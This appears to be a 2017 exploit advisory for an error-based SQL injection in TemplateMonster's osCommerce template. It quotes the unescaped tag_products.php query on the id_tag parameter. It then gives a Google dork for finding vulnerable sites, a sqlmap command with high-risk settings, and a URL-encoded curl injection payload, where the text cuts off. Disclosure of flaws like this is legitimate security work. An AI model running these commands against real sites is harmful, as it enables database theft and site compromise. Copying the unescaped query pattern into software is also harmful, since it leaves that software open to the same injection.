______ ______ _____ ___ _____ _____ _____ | ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _| | |_/ / | |_/ / | | | | | | | |__ | / \/ | | | __/ | / | | | | | | | __| | | | | | | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | | \_| \_| \_| \___/ \____/ \____/ \____/ \_/ _____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __ |_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / / | | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V / | | | . ` | `--. \ | __| | | | | | | | / | | | | \ / _| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | | \___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/ [+]---------------------------------------------------------[+] | Vulnerable Software: TemplateMonster osCommerce | | Vendor: http://templatemonster.org | | Vulnerability Type: Error-based SQL Injection | | Date Released: 23/04/2017 | | Released by: Project Insecurity (@insecurity)| [+]---------------------------------------------------------[+] TemplateMonster is a site that makes templates for various content management systems. There are severe SQL injection issues in their template for popular CMS 'osCommerce' - this can lead to a complete system compromise of any site using this template. Estimated around 70k-100k vulnerable sites although not that many are indexed on google. This source apears to be a developer from templatemonster releasing source code publicly instead of forcing users to pay for it. The source is vulnerable to SQL INJECTION in the tag_products.php file: https://github.com/templatemonster/oscommerce/blob/master/theme/tag_products.php The code for this file can be seen below: ------------------------------------------------------------------------------------------------------------- $tag_id= $HTTP_GET_VARS['id_tag']; $tag_text=""; $tags_query = tep_db_query("select * from ". TABLE_TAGS ." where tag_id='". $tag_id ."'"); while ($tags_result = tep_db_fetch_array($tags_query)) { $tag_text = urldecode($tags_result['tag_text']); } ------------------------------------------------------------------------------------------------------------- As you can see above, it does not escape the SQL statement and accepts any value for the id_tag GET param Basic PoC of how exploitation would take place using SQLMap + cURL (and html2text for sorting): ------------------------------------------------------------------------------------------------------------- #OsCommerce TemplateMonster ERROR BASED SQL Injection Vulnerability Checker & Exploiter #Google Dork: inurl:tag_products inurl:id_tag -github #Sqlmap Command: python sqlmap.py -u http://localhost/tag_products.php?id_tag=6 --dbms=MYSQL --random-agent --level=5 --risk=3 --threads=10 --test-filter=FLOOR #Requirements: curl, html2text, grep, head #curl -s http://localhost/tag_products.php?id_tag=9%20%20AND%20%28SELECT%206354%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20%28ELT%286354%3D6354%2C1%29%29%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.plugins%20GROUP%20BY%20x%29a%29 |grep "